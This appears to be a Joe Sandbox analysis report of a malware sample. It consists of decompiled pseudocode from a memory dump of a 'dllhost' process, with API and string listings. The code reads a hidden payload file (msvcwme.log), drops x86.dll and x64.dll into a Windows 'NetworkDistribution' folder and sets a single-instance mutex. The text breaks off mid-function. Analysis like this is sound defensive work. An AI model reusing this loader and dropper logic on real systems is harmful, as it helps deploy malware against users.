                                                						E0286EC60(_t76);
                                                						_t142 = _a4;
                                                					}
                                                					_t77 =  *_t174;
                                                					_push(_t181);
                                                					__eflags =  *((intOrPtr*)(_t77 + 0x10)) - _t142;
                                                					if( *((intOrPtr*)(_t77 + 0x10)) < _t142) {
                                                						do {
                                                							_t190 =  *_t174;
                                                							__eflags = _t190;
                                                							if(_t190 != 0) {
                                                								__eflags =  *(_t190 + 0x18);
                                                								if( *(_t190 + 0x18) != 0) {
                                                									_t166 =  *((intOrPtr*)(_t190 + 0x10)) + 1;
                                                									__eflags = _t166 -  *((intOrPtr*)(_t190 + 4));
                                                									if(_t166 !=  *((intOrPtr*)(_t190 + 4))) {
                                                										 *((intOrPtr*)(_t190 + 0x10)) = _t166;
                                                										 *((intOrPtr*)(_t190 + 0x14)) =  *((intOrPtr*)(_t190 + 0x14)) +  *((intOrPtr*)(_t190 + 0x48)) + 0x2e +  *((intOrPtr*)(_t190 + 0x50)) +  *((intOrPtr*)(_t190 + 0x4c));
                                                										_t20 = _t190 + 0x28; // 0x28
                                                										_t166 = _t20;
                                                										_t21 = _t190 + 0x78; // 0x78
                                                										_t125 = E0286E7C0(_t190, _t20, _t21, 0, 0);
                                                										_t142 = _a4;
                                                										_t198 = _t198 - 0x10 + 0x1c;
                                                										asm("sbb eax, eax");
                                                										_t127 =  ~_t125 + 1;
                                                										__eflags = _t127;
                                                										 *(_t190 + 0x18) = _t127;
                                                									}
                                                								}
                                                							}
                                                							_t120 =  *_t174;
                                                							__eflags =  *((intOrPtr*)(_t120 + 0x10)) - _t142;
                                                						} while ( *((intOrPtr*)(_t120 + 0x10)) < _t142);
                                                					}
                                                					E0286F4E0(_t133, _t174, _t166, _t174, _t142,  &_v828);
                                                					__eflags = _v564 & 0x00000010;
                                                					_t80 =  *_t133;
                                                					if((_v564 & 0x00000010) == 0) {
                                                						_t167 = _t133;
                                                						_t144 = _t133;
                                                						__eflags = _t80;
                                                						while(_t80 != 0) {
                                                							__eflags = _t80 - 0x2f;
                                                							if(_t80 == 0x2f) {
                                                								L23:
                                                								_t32 =  &(_t144[0]); // 0x2865105
                                                								_t167 = _t32;
                                                							} else {
                                                								__eflags = _t80 - 0x5c;
                                                								if(_t80 == 0x5c) {
                                                									goto L23;
                                                								}
                                                							}
                                                							_t33 =  &(_t144[0]); // 0x2896a4c
                                                							_t80 =  *_t33;
                                                							_t144 =  &(_t144[0]);
                                                							__eflags = _t80;
                                                						}
                                                						_t145 = _t133;
                                                						_t183 =  &_v268 - _t133;
                                                						__eflags = _t183;
                                                						do {
                                                							_t81 =  *_t145;
                                                							_t35 =  &(_t145[0]); // 0x2896a4c
                                                							_t145 = _t35;
                                                							 *((char*)(_t183 + _t145 - 1)) = _t81;
                                                							__eflags = _t81;
                                                						} while (_t81 != 0);
                                                						__eflags = _t167 - _t133;
                                                						if(_t167 != _t133) {
                                                							_t83 = _t167 - _t133;
                                                							__eflags = _t83 - 0x104;
                                                							if(_t83 >= 0x104) {
                                                								E02870E90();
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								_push(_t183);
                                                								_t184 = _t145;
                                                								_push(_t174);
                                                								__eflags = _t184[1] - 0xffffffff;
                                                								if(_t184[1] != 0xffffffff) {
                                                									E0286F2D0( *_t184, _t167);
                                                								}
                                                								_t175 =  *_t184;
                                                								_t184[1] = 0xffffffff;
                                                								__eflags = _t175;
                                                								if(_t175 != 0) {
                                                									__eflags =  *(_t175 + 0x7c);
                                                									if( *(_t175 + 0x7c) != 0) {
                                                										E0286F2D0(_t175, _t167);
                                                									}
                                                									_push(_t133);
                                                									_t134 =  *_t175;
                                                									__eflags = _t134;
                                                									if(_t134 != 0) {
                                                										__eflags =  *((char*)(_t134 + 0x10));
                                                										if( *((char*)(_t134 + 0x10)) != 0) {
                                                											CloseHandle( *(_t134 + 4));
                                                										}
                                                										_push(0x20);
                                                										E02870AA1(_t134);
                                                										_t198 = _t198 + 8;
                                                									}
                                                									L02875A36(_t175);
                                                								}
                                                								__eflags = 0;
                                                								 *_t184 = 0;
                                                								return 0;
                                                							} else {
                                                								 *((char*)(_t192 + _t83 - 0x108)) = 0;
                                                								_t91 = _v268;
                                                								__eflags = _t91 - 0x2f;
                                                								if(_t91 == 0x2f) {
                                                									L35:
                                                									wsprintfA( &_v528, "%s%s",  &_v268, _t167);
                                                									_t200 = _t198 + 0x10;
                                                									_t148 = 0;
                                                									__eflags = 0;
                                                								} else {
                                                									__eflags = _t91 - 0x5c;
                                                									if(_t91 == 0x5c) {
                                                										goto L35;
                                                									} else {
                                                										__eflags = _t91;
                                                										if(_t91 == 0) {
                                                											goto L34;
                                                										} else {
                                                											__eflags = _v267 - 0x3a;
                                                											if(_v267 == 0x3a) {
                                                												goto L35;
                                                											} else {
                                                												goto L34;
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L36;
                                                							}
                                                						} else {
                                                							_v268 = _t81;
                                                							L34:
                                                							_t183 =  &(_t174[0x50]);
                                                							wsprintfA( &_v528, "%s%s%s", _t183,  &_v268, _t167);
                                                							_t200 = _t198 + 0x14;
                                                							_t148 = _t183;
                                                							L36:
                                                							E0286FB00(_t148,  &_v268); // executed
                                                							_t97 = CreateFileA( &_v528, 0x40000000, 0, 0, 2, _v564, 0); // executed
                                                							_t136 = _t97;
                                                							__eflags = _t136 - 0xffffffff;
                                                							if(_t136 != 0xffffffff) {
                                                								E0286EF10( *_t174, _t174[0x4e]); // executed
                                                								__eflags = _t174[0x4f];
                                                								if(__eflags == 0) {
                                                									_push(0x4000);
                                                									_t111 = E02870AB4(_t183, __eflags);
                                                									_t200 = _t200 + 4;
                                                									_t174[0x4f] = _t111;
                                                								}
                                                								_v836 = 0;
                                                								while(1) {
                                                									_t170 = _t174[0x4f];
                                                									_t100 = E0286F090( *_t174, _t174[0x4f], 0x4000,  &_v829); // executed
                                                									_t186 = _t100;
                                                									_t200 = _t200 + 8;
                                                									__eflags = _t186 - 0xffffff96;
                                                									if(_t186 == 0xffffff96) {
                                                										break;
                                                									}
                                                									__eflags = _t186;
                                                									if(__eflags < 0) {
                                                										L47:
                                                										_v836 = 0x5000000;
                                                									} else {
                                                										if(__eflags <= 0) {
                                                											L45:
                                                											__eflags = _v829;
                                                											if(_v829 != 0) {
                                                												SetFileTime(_t136,  &_v552,  &_v560,  &_v544); // executed
                                                											} else {
                                                												__eflags = _t186;
                                                												if(_t186 != 0) {
                                                													continue;
                                                												} else {
                                                													goto L47;
                                                												}
                                                											}
                                                										} else {
                                                											_t110 = WriteFile(_t136, _t174[0x4f], _t186,  &_v840, 0); // executed
                                                											__eflags = _t110;
                                                											if(_t110 == 0) {
                                                												_v836 = 0x400;
                                                											} else {
                                                												goto L45;
                                                											}
                                                										}
                                                									}
                                                									L51:
                                                									FindCloseChangeNotification(_t136); // executed
                                                									E0286F2D0( *_t174, _t170);
                                                									__eflags = _v8 ^ _t192;
                                                									_pop(_t187);
                                                									return E02870A5D(_v8 ^ _t192, _t187);
                                                									goto L64;
                                                								}
                                                								_v836 = 0x1000;
                                                								goto L51;
                                                							} else {
                                                								_pop(_t188);
                                                								__eflags = _v8 ^ _t192;
                                                								return E02870A5D(_v8 ^ _t192, _t188);
                                                							}
                                                						}
                                                					} else {
                                                						__eflags = _t80 - 0x2f;
                                                						if(_t80 == 0x2f) {
                                                							L18:
                                                							_t156 = 0;
                                                							__eflags = 0;
                                                						} else {
                                                							__eflags = _t80 - 0x5c;
                                                							if(_t80 == 0x5c) {
                                                								goto L18;
                                                							} else {
                                                								__eflags = _t80;
                                                								if(_t80 == 0) {
                                                									L17:
                                                									_t156 =  &(_t174[0x50]);
                                                								} else {
                                                									__eflags = _t133[0] - 0x3a;
                                                									if(_t133[0] == 0x3a) {
                                                										goto L18;
                                                									} else {
                                                										goto L17;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						E0286FB00(_t156, _t133);
                                                						_pop(_t189);
                                                						__eflags = _v8 ^ _t192;
                                                						return E02870A5D(_v8 ^ _t192, _t189);
                                                					}
                                                				} else {
                                                					return E02870A5D(_v8 ^ _t192, _t181);
                                                				}
                                                				L64:
                                                			}

                                                APIs
                                                • wsprintfA.USER32 ref: 0286FDA6
                                                • wsprintfA.USER32 ref: 0286FDC7
                                                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 0286FDF7
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0286FE8A
                                                • SetFileTime.KERNELBASE(00000000,?,?,?), ref: 0286FECF
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0286FEE2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$wsprintf$ChangeCloseCreateFindNotificationTimeWrite
                                                • String ID: %s%s$%s%s%s$:
                                                • API String ID: 2340708895-3034790606
                                                • Opcode ID: a8129ffd51fa7e1da65f0d7ad5126aa118ae8e2a51bb02b7b90eb835b151ac22
                                                • Instruction ID: 2c01bc5cba53e594e4e21fca43b2b561086c28ca8a3932a5321780c18952c7ff
                                                • Opcode Fuzzy Hash: a8129ffd51fa7e1da65f0d7ad5126aa118ae8e2a51bb02b7b90eb835b151ac22
                                                • Instruction Fuzzy Hash: 77912D7D6002189BDB24CF68E888BF9B766AF14304F100599DA5FDBA81C770F995CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 91%
                                                			E02866FE0(void* __ebx, CHAR* __ecx, void* __edi) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				char _v788;
                                                				void* __esi;
                                                				signed int _t17;
                                                				void* _t23;
                                                				void* _t29;
                                                				void* _t30;
                                                				void* _t42;
                                                				CHAR* _t59;
                                                				signed int _t60;
                                                
                                                				_t58 = __edi;
                                                				_t17 =  *0x288f008; // 0xe7fe870c
                                                				_v8 = _t17 ^ _t60;
                                                				_t59 = __ecx;
                                                				E02873440(__edi,  &_v268, 0, 0x104);
                                                				_push("Diagnostics.txt");
                                                				E02865180( &_v268, 0x104, "%s\%s", _t59);
                                                				_t23 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0, 0); // executed
                                                				_t66 = _t23 - 0xffffffff;
                                                				if(_t23 == 0xffffffff) {
                                                					L5:
                                                					__eflags = _v8 ^ _t60;
                                                					return E02870A5D(_v8 ^ _t60, _t59);
                                                				} else {
                                                					FindCloseChangeNotification(_t23); // executed
                                                					CreateDirectoryA(_t59, 0); // executed
                                                					_t29 = E02867140(_t66,  &_v268); // executed
                                                					_t67 = _t29;
                                                					if(_t29 == 0) {
                                                						goto L5;
                                                					} else {
                                                						_t30 = E02865010(__ebx, _t59, _t58, _t67); // executed
                                                						_t68 = _t30;
                                                						if(_t30 == 0) {
                                                							goto L5;
                                                						} else {
                                                							DeleteFileA( &_v268);
                                                							E02873440(_t58,  &_v528, 0, 0x104);
                                                							E02873440(_t58,  &_v788, 0, 0x104);
                                                							E02865180( &_v528, 0x104, "%s\\x86.dll", _t59);
                                                							E02865180( &_v788, 0x104, "%s\\x64.dll", _t59);
                                                							_t42 = E02867140(_t68,  &_v528);
                                                							_t69 = _t42;
                                                							if(_t42 == 0) {
                                                								goto L5;
                                                							} else {
                                                								E02867140(_t69,  &_v788);
                                                								return E02870A5D(_v8 ^ _t60, _t59);
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}
















                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0286703C
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0286704C
                                                • CreateDirectoryA.KERNELBASE(?,00000000), ref: 02867055
                                                • DeleteFileA.KERNEL32(?), ref: 02867093
                                                  • Part of subcall function 02867140: CreateFileA.KERNELBASE(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?), ref: 0286718D
                                                  • Part of subcall function 02867140: WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?), ref: 028671A5
                                                  • Part of subcall function 02867140: CloseHandle.KERNEL32(00000000,?,?), ref: 028671B0
                                                  • Part of subcall function 02867140: FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 028671BE
                                                  • Part of subcall function 02867140: LocalFree.KERNELBASE(00000000,?,?), ref: 028671C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$CloseCreate$ChangeFindNotification$DeleteDirectoryFreeHandleLocalWrite
                                                • String ID: %s\%s$%s\x64.dll$%s\x86.dll$C:\Windows\system32\msvcwme.log$Diagnostics.txt
                                                • API String ID: 3326945587-1068396467
                                                • Opcode ID: 5a8332a1b565682b89c32a7f5d6a97ffbcea8f4c7e5f8dcc73dfb6f9096adab2
                                                • Instruction ID: 4519d085ed59699e4158f084b0aa5e4445f3828ec6583d3c657e0b50e0b39b73
                                                • Opcode Fuzzy Hash: 5a8332a1b565682b89c32a7f5d6a97ffbcea8f4c7e5f8dcc73dfb6f9096adab2
                                                • Instruction Fuzzy Hash: 8031EDBCA40318B7EA20E764DC4AFE9735DDF05704F5004D2B694EB1C0D6B4A7948A92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 235 28649e0-2864a0e CreateFileA 236 2864a10-2864a3f GetFileSizeEx LocalAlloc 235->236 237 2864a48-2864a50 235->237 238 2864a51-2864a5e 236->238 239 2864a41-2864a42 CloseHandle 236->239 240 2864a60-2864a7c ReadFile 238->240 241 2864a8c-2864a8f 238->241 239->237 242 2864a7e-2864a87 240->242 243 2864a89 240->243 244 2864a91-2864aaa CloseHandle LocalFree 241->244 245 2864aab-2864ab9 FindCloseChangeNotification 241->245 242->240 242->243 243->241
                                                C-Code - Quality: 67%
                                                			E028649E0(void** __edx, struct _OVERLAPPED** _a4) {
                                                				void** _v12;
                                                				long _v16;
                                                				long _v20;
                                                				struct _OVERLAPPED* _v28;
                                                				long _v32;
                                                				void* _t15;
                                                				void* _t18;
                                                				long _t19;
                                                				long _t27;
                                                				void* _t29;
                                                				void** _t30;
                                                				struct _OVERLAPPED** _t33;
                                                				long _t34;
                                                
                                                				_v12 = __edx;
                                                				_t15 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                				_t29 = _t15;
                                                				if(_t29 == 0xffffffff) {
                                                					L3:
                                                					return 0;
                                                				} else {
                                                					_v32 = 0;
                                                					_v28 = 0;
                                                					__imp__GetFileSizeEx(_t29,  &_v32);
                                                					_t34 = _v32;
                                                					_v20 = _t34;
                                                					_t18 = LocalAlloc(0x40, _t34);
                                                					_t30 = _v12;
                                                					 *_t30 = _t18;
                                                					if(_t18 != 0) {
                                                						_t33 = _a4;
                                                						_t19 = _t34;
                                                						 *_t33 = 0;
                                                						if(_t19 > 0) {
                                                							while(1) {
                                                								_v16 = 0;
                                                								ReadFile(_t29,  *_t30, _t34,  &_v16, 0); // executed
                                                								_t27 = _v16;
                                                								if(_t27 == 0) {
                                                									break;
                                                								}
                                                								 *_t33 =  *_t33 + _t27;
                                                								_t34 = _t34 - _t27;
                                                								_t30 = _v12;
                                                								if(_t34 > 0) {
                                                									continue;
                                                								}
                                                								break;
                                                							}
                                                							_t19 = _v20;
                                                						}
                                                						_push(_t29);
                                                						if( *_t33 == _t19) {
                                                							FindCloseChangeNotification(); // executed
                                                							return 1;
                                                						} else {
                                                							CloseHandle();
                                                							LocalFree( *_v12);
                                                							return 0; // executed
                                                						}
                                                					} else {
                                                						CloseHandle(_t29);
                                                						goto L3;
                                                					}
                                                				}
                                                			}

















                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490,?,?,?,?,02864AE6,?), ref: 02864A03
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,73B76490), ref: 02864A23
                                                • LocalAlloc.KERNEL32(00000040,00000000,?,73B76490), ref: 02864A32
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02864A42
                                                • ReadFile.KERNELBASE(00000000,73B76490,00000000,?,00000000,?,73B76490), ref: 02864A71
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02864A91
                                                • LocalFree.KERNEL32(73B76490,?,73B76490), ref: 02864A9C
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,73B76490), ref: 02864AAB
                                                Strings
                                                • C:\Windows\system32\msvcwme.log, xrefs: 028649FB
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CloseFile$HandleLocal$AllocChangeCreateFindFreeNotificationReadSize
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 4148216468-2357825738
                                                • Opcode ID: ef2b8cdde9934e622c3648c2f32c12ab9e0d86eb23fd15d6f68ea80caabbc914
                                                • Instruction ID: 880d0b188c1bc7a58d4fac96a59d2887ecade32193776c8cdc5a48398d2630c2
                                                • Opcode Fuzzy Hash: ef2b8cdde9934e622c3648c2f32c12ab9e0d86eb23fd15d6f68ea80caabbc914
                                                • Instruction Fuzzy Hash: 9121E57DE40209BBDB208FA9EC89BBEBBB8EB08711F500151F908E7280D7755460CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 38%
                                                			E02869310() {
                                                				signed int _v8;
                                                				signed int _v16;
                                                				char _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				char _v48;
                                                				char _v444;
                                                				void* __esi;
                                                				signed int _t12;
                                                				void* _t16;
                                                				signed int _t18;
                                                				void* _t29;
                                                				void* _t30;
                                                				void* _t31;
                                                				void* _t32;
                                                				signed int _t33;
                                                
                                                				_t35 = (_t33 & 0xfffffff8) - 0x1bc;
                                                				_t12 =  *0x288f008; // 0xe7fe870c
                                                				_v8 = _t12 ^ (_t33 & 0xfffffff8) - 0x000001bc;
                                                				__imp__#115(0x202,  &_v444, _t29); // executed
                                                				asm("movaps xmm0, [0x288cf90]");
                                                				asm("movups [esp+0x1a8], xmm0");
                                                				_v32 = 0x2d383132;
                                                				_v28 = 0x44383732;
                                                				_v24 = 0x7d454536;
                                                				_v20 = 0;
                                                				_t16 = CreateMutexA(0, 1,  &_v48); // executed
                                                				_t30 = _t16;
                                                				_t18 = GetLastError() & 0xffffff00 | _t17 == 0x000000b7;
                                                				if(_t30 == 0) {
                                                					L3:
                                                					_pop(_t31);
                                                					_t10 =  &_v16; // 0x2d383132
                                                					return E02870A5D( *_t10 ^ _t35, _t31);
                                                				} else {
                                                					if(_t18 == 0) {
                                                						_pop(_t32);
                                                						return E02870A5D(_v16 ^ _t35, _t32);
                                                					} else {
                                                						ReleaseMutex(_t30);
                                                						CloseHandle(_t30);
                                                						goto L3;
                                                					}
                                                				}
                                                			}





















                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 02869335
                                                • CreateMutexA.KERNELBASE ref: 0286937F
                                                • GetLastError.KERNEL32 ref: 02869387
                                                • ReleaseMutex.KERNEL32(00000000), ref: 0286939E
                                                • CloseHandle.KERNEL32(00000000), ref: 028693A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Mutex$CloseCreateErrorHandleLastReleaseStartup
                                                • String ID: 218-$278D$6EE}
                                                • API String ID: 2916891069-3960941272
                                                • Opcode ID: b968380d0d7fbd95aae780b79465ccf77950007934a18ad5c613af64edac0e49
                                                • Instruction ID: eae6ecf9f4389810a7178524b06a531a8e3f62120dca9e7ff742420475c99ba6
                                                • Opcode Fuzzy Hash: b968380d0d7fbd95aae780b79465ccf77950007934a18ad5c613af64edac0e49
                                                • Instruction Fuzzy Hash: 0011A0398883448BD6709B28E8497EAB7D8BF86714F84190DE89D8B2C0DB7454558B83
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 84%
                                                			E02866D40() {
                                                				signed int _v8;
                                                				char _v9;
                                                				short _v11;
                                                				char _v15;
                                                				char _v40;
                                                				char _v300;
                                                				char _v560;
                                                				signed int _t18;
                                                				signed char _t29;
                                                				signed int _t30;
                                                				intOrPtr* _t31;
                                                				void* _t35;
                                                				signed char _t47;
                                                				intOrPtr _t51;
                                                				void* _t54;
                                                				void* _t56;
                                                				void* _t57;
                                                				intOrPtr* _t59;
                                                				signed int _t60;
                                                				void* _t61;
                                                				void* _t63;
                                                
                                                				_t18 =  *0x288f008; // 0xe7fe870c
                                                				_v8 = _t18 ^ _t60;
                                                				_push(_t56);
                                                				E02873440(_t56,  &_v300, 0, 0x104);
                                                				E02873440(_t56,  &_v560, 0, 0x104);
                                                				GetWindowsDirectoryA( &_v560, 0x104);
                                                				_push("NetworkDistribution");
                                                				E02865180( &_v300, 0x104, "%s\\%s\\",  &_v560);
                                                				_t63 = _t61 + 0x2c;
                                                				_t29 = E02866FE0(1,  &_v300, _t56); // executed
                                                				_t57 = Sleep;
                                                				asm("sbb bl, bl");
                                                				_t47 =  ~_t29 &  ~_t29;
                                                				while(1) {
                                                					asm("xorps xmm0, xmm0");
                                                					_v40 = 0;
                                                					asm("movups [ebp-0x23], xmm0");
                                                					_t59 = 0;
                                                					_v15 = 0;
                                                					asm("movq [ebp-0x13], xmm0");
                                                					_v11 = 0;
                                                					_v9 = 0;
                                                					EnterCriticalSection(0x2896a5c);
                                                					_t30 =  *0x2895ba0;
                                                					if(_t30 != 0) {
                                                						_t49 =  *0x2895b9c;
                                                						_t38 = _t30 - 1;
                                                						_t59 =  *((intOrPtr*)( *0x2895b9c));
                                                						 *0x2895ba0 = _t30 - 1;
                                                						E02871920( *0x2895b9c, _t49 + 4, _t38 << 2);
                                                						_t63 = _t63 + 0xc;
                                                						E02866EF0(0x2895b80);
                                                					}
                                                					L3:
                                                					LeaveCriticalSection(0x2896a5c);
                                                					if(_t59 == 0) {
                                                						Sleep(0x64);
                                                						continue;
                                                						do {
                                                							while(1) {
                                                								asm("xorps xmm0, xmm0");
                                                								_v40 = 0;
                                                								asm("movups [ebp-0x23], xmm0");
                                                								_t59 = 0;
                                                								_v15 = 0;
                                                								asm("movq [ebp-0x13], xmm0");
                                                								_v11 = 0;
                                                								_v9 = 0;
                                                								EnterCriticalSection(0x2896a5c);
                                                								_t30 =  *0x2895ba0;
                                                								if(_t30 != 0) {
                                                									_t49 =  *0x2895b9c;
                                                									_t38 = _t30 - 1;
                                                									_t59 =  *((intOrPtr*)( *0x2895b9c));
                                                									 *0x2895ba0 = _t30 - 1;
                                                									E02871920( *0x2895b9c, _t49 + 4, _t38 << 2);
                                                									_t63 = _t63 + 0xc;
                                                									E02866EF0(0x2895b80);
                                                								}
                                                								goto L3;
                                                							}
                                                							L9:
                                                							_t35 = E02867720(_t47,  &_v40,  &_v300, _t57, _t59, _t70);
                                                							_t71 = _t35;
                                                						} while (_t35 != 0);
                                                						L10:
                                                						if(E0286B070( &_v40, _t71) == 0) {
                                                							Sleep(0xa);
                                                						}
                                                						continue;
                                                					}
                                                					_t31 = _t59;
                                                					_t13 = _t31 + 1; // 0x1
                                                					_t54 = _t13;
                                                					do {
                                                						_t51 =  *_t31;
                                                						_t31 = _t31 + 1;
                                                					} while (_t51 != 0);
                                                					if(_t31 - _t54 > 4) {
                                                						E02875C70( &_v40, 0x20, _t59);
                                                						_t63 = _t63 + 0xc;
                                                					}
                                                					_push(0x2c);
                                                					E02870AA1(_t59);
                                                					_t63 = _t63 + 8;
                                                					_t70 = _t47;
                                                					if(_t47 == 0) {
                                                						goto L10;
                                                					} else {
                                                						goto L9;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02866D8D
                                                  • Part of subcall function 02866FE0: CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0286703C
                                                  • Part of subcall function 02866FE0: FindCloseChangeNotification.KERNELBASE(00000000), ref: 0286704C
                                                  • Part of subcall function 02866FE0: CreateDirectoryA.KERNELBASE(?,00000000), ref: 02867055
                                                  • Part of subcall function 02866FE0: DeleteFileA.KERNEL32(?), ref: 02867093
                                                • EnterCriticalSection.KERNEL32(02896A5C), ref: 02866DF9
                                                • LeaveCriticalSection.KERNEL32(02896A5C), ref: 02866E36
                                                • Sleep.KERNEL32(0000000A), ref: 02866E99
                                                • Sleep.KERNEL32(00000064), ref: 02866EA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CreateCriticalDirectoryFileSectionSleep$ChangeCloseDeleteEnterFindLeaveNotificationWindows
                                                • String ID: %s\%s\$NetworkDistribution
                                                • API String ID: 2690460970-574155335
                                                • Opcode ID: f0c0874ea5d0b9ecf0ad19d48156f5414744a540b3e7befea6733c9b24b13ed3
                                                • Instruction ID: a3c6c1b86b763715f5e57df7b2bfab1f3b76ff7bbe81ea7dac173d2f0a850419
                                                • Opcode Fuzzy Hash: f0c0874ea5d0b9ecf0ad19d48156f5414744a540b3e7befea6733c9b24b13ed3
                                                • Instruction Fuzzy Hash: DB31097DD40228ABEB10EBB4DC49FEE73A99F04704F944054E504F7180FB79E6588BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 81%
                                                			E02864AC0(void* __ecx, intOrPtr __edx, void** _a4, long* _a8) {
                                                				void* _v8;
                                                				long _v12;
                                                				signed int _v16;
                                                				char _v20;
                                                				intOrPtr _v24;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t44;
                                                				long _t51;
                                                				long _t61;
                                                				long _t62;
                                                				long _t66;
                                                				void* _t78;
                                                				void* _t79;
                                                				long* _t80;
                                                				long _t87;
                                                				intOrPtr _t89;
                                                				intOrPtr* _t90;
                                                				void* _t92;
                                                				void* _t93;
                                                
                                                				_v24 = __edx;
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				_t44 = E028649E0( &_v8,  &_v12); // executed
                                                				_t93 = _t92 + 4;
                                                				if(_t44 != 0) {
                                                					_t87 = _v12;
                                                					_t78 = 0;
                                                					_v16 = 0;
                                                					__eflags = _t87;
                                                					if(__eflags <= 0) {
                                                						L10:
                                                						LocalFree(_v8); // executed
                                                						return _v16;
                                                					} else {
                                                						while(1) {
                                                							_t90 = E02870A6E(_t90, __eflags, 0x58);
                                                							_v20 = _t90;
                                                							_v20 = _t90;
                                                							E02873440(_t87, _t90, 0, 0x58);
                                                							_t93 = _t93 + 0x10;
                                                							asm("movups xmm0, [ebx+eax]");
                                                							asm("movups [esi], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x10]");
                                                							asm("movups [esi+0x10], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x20]");
                                                							asm("movups [esi+0x20], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x30]");
                                                							asm("movups [esi+0x30], xmm0");
                                                							asm("movups xmm0, [ebx+eax+0x40]");
                                                							_t79 = _t78 + 0x50;
                                                							asm("movups [esi+0x40], xmm0");
                                                							__eflags =  *_t90 - _v24;
                                                							if( *_t90 == _v24) {
                                                								break;
                                                							}
                                                							_t78 = _t79 +  *(_t90 + 0x38) +  *(_t90 + 0xc);
                                                							__eflags = _t78 - _t87;
                                                							if(__eflags < 0) {
                                                								continue;
                                                							} else {
                                                								LocalFree(_v8);
                                                								return _v16;
                                                							}
                                                							goto L11;
                                                						}
                                                						_t51 =  *(_t90 + 0xc);
                                                						_v12 = _t51;
                                                						 *((intOrPtr*)(_t90 + 0x50)) = LocalAlloc(0x40, _t51);
                                                						 *((intOrPtr*)(_t90 + 0x54)) = LocalAlloc(0x40,  *(_t90 + 0x38));
                                                						E02883DB0( *((intOrPtr*)(_t90 + 0x50)), _v8 + _t79, _v12);
                                                						E02883DB0( *((intOrPtr*)(_t90 + 0x54)), _v12 + _t79 + _v8,  *(_t90 + 0x38));
                                                						_t61 = E028648B0( &_v20);
                                                						__eflags = _t61;
                                                						if(_t61 == 0) {
                                                							goto L10;
                                                						} else {
                                                							_t89 = _v20;
                                                							_t80 = _a8;
                                                							_t62 =  *(_t89 + 8);
                                                							 *_t80 = _t62;
                                                							 *_a4 = LocalAlloc(0x40, _t62);
                                                							E02873440(_t89, _t63, 0,  *(_t89 + 8));
                                                							_t66 = E02861000(_t63, _t80,  *((intOrPtr*)(_t89 + 0x50)), _v12);
                                                							__eflags = _t66;
                                                							if(_t66 == 0) {
                                                								__eflags =  *_t80 -  *(_t89 + 8);
